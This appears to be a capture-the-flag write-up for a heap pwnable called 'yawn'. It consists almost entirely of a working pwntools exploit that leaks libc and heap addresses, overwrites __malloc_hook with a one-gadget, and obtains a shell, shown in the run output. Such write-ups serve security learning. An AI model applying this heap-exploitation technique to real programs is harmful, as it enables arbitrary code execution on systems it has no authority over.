Category : pwnable
Summary : heap
Exploit
#!/usr/bin/python
from pwn import *
def cmd_add(name, desc):
    """Drive menu option 1 ("add") on the challenge process.

    Waits for the menu prompt, picks option 1, answers the name prompt
    with ``name`` and, after consuming the description prompt, sends
    ``desc`` only when it is non-empty.  The description prompt is read
    in either case so the stream stays in sync.

    Uses the module-level ``ru``/``sl`` aliases bound to the process.
    Returns nothing.
    """
    ru('>> ')
    sl('1')
    ru('Enter name: ')
    sl(name)
    ru('Enter desc: ')
    if not desc:
        # Empty description: the prompt was consumed, nothing is sent.
        return
    sl(desc)
def cmd_edit(idx, name, size, desc):
    """Drive menu option 2 ("edit") on the challenge process.

    Answers, in order, the index, name, size and description prompts.
    ``idx`` and ``size`` are sent as decimal strings with a trailing
    newline (``sl``); ``name`` and ``desc`` are sent raw with no newline
    (``ss``), so the caller controls their exact length.

    Uses the module-level ``ru``/``sl``/``ss`` aliases.  Returns nothing.
    """
    # (prompt to wait for, sender to use, payload) in protocol order.
    exchanges = (
        ('>> ', sl, '2'),
        ('Enter index: ', sl, str(idx)),
        ('Enter name: ', ss, name),
        ('Enter size: ', sl, str(size)),
        ('Enter desc: ', ss, desc),
    )
    for prompt, send, payload in exchanges:
        ru(prompt)
        send(payload)
def cmd_remove(idx):
    """Drive menu option 3 ("remove") for note ``idx``.

    Uses the module-level ``ru``/``sl`` aliases.  Returns nothing.
    """
    steps = (('>> ', '3'), ('Enter idx: ', str(idx)))
    for prompt, answer in steps:
        ru(prompt)
        sl(answer)
def cmd_view(idx):
    """Drive menu option 4 ("view") for note ``idx`` and parse the reply.

    Returns a dict with keys ``idx`` (int), ``name`` (str), ``size``
    (int) and ``desc`` (str), each read as the remainder of the line
    following the corresponding label, without the line ending.

    Uses the module-level ``ru``/``sl``/``rl`` aliases.
    """
    ru('>> ')
    sl('4')
    ru('Enter idx: ')
    sl(str(idx))
    # (label printed by the binary, dict key, converter or None for raw).
    layout = (
        ('Note ID : ', 'idx', int),
        ('Name : ', 'name', None),
        ('Size : ', 'size', int),
        ('Description : ', 'desc', None),
    )
    note = {}
    for label, key, convert in layout:
        ru(label)
        raw = rl(False)
        note[key] = convert(raw) if convert is not None else raw
    return note
# Spawn the challenge binary locally; every helper above talks to this handle.
s = process('./yawn')
# Short aliases used by the cmd_* helpers.
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send
# Fixed addresses for this particular (non-PIE) build of ./yawn.
# NOTE(review): these, and every offset below, are build-specific values
# taken from the author's environment — they do not carry over to another
# binary or libc; confirm against the actual target before reuse.
free_got = 0x601F68
note_table = 0x602040
# for libc leak
# Note 0: the name field is padded to 0x50 bytes and followed by two qwords;
# the description read back from note 0 is then interpreted as an 8-byte
# libc pointer (padded with NULs because the line may be shorter than 8).
cmd_add('a' * 0x50+p64(0xffffffffffffffff)+p64(free_got), '')
# 0x844f0 is the author's offset from the leaked value to the libc base.
libc_base = u64(cmd_view(0)['desc'].ljust(8, '\x00')) - 0x844f0
print hex(libc_base)
# Offsets below are relative to libc_base for the author's libc build.
libc_malloc_hook = libc_base + 0x3c4b10
libc_one_gadget = libc_base + 0xf1147
'''
0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
# for heap leak
# Same pattern as note 0, this time reading back from note 1; 0x1040 is the
# author's offset from the leaked value to the heap base.
cmd_add('b' * 0x50+p64(0xffffffffffffffff)+p64(note_table), '')
heap_base = u64(cmd_view(1)['desc'].ljust(8, '\x00')) - 0x1040
print hex(heap_base)
# Notes 2 and 3; the trailing comments give the author's expected chunk sizes.
cmd_add('c' * 0x30, 'C' * 0x59) # 2 : 0x70 0x70
cmd_add('d' * 0x50 + p64(0xffffffffffffffff)+p64(heap_base + 0x1010+ (0x20+0x70)*2+0x10), '') # 3 : 0x20 0x70
# pointing note2 -> description
# Free notes 2 and 3, then re-add four notes; the second one carries an
# address near libc_malloc_hook as its name.
cmd_remove(2)
cmd_remove(3)
cmd_add('NO', '_' * 9)
cmd_add(p64(libc_malloc_hook - 0x23), '_' * 9)
cmd_add('NO', '_' * 9)
cmd_add('NO', '_' * 9)
# reallocate libc_malloc_hook
# Name is 0x13 bytes of padding followed by the one-gadget address.
cmd_add('e' * (0x23-0x10) + p64(libc_one_gadget), '_' * 9)
# trigger
# One more allocation; the strings here are cosmetic.
cmd_add('give me the shell', 'paul')
# Hand the I/O to the user, then close the process handle on exit.
s.interactive()
s.close()
$ python ex.py
[+] Starting local process './yawn': pid 2050
0x7fb84bb3e000
0x178a000
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)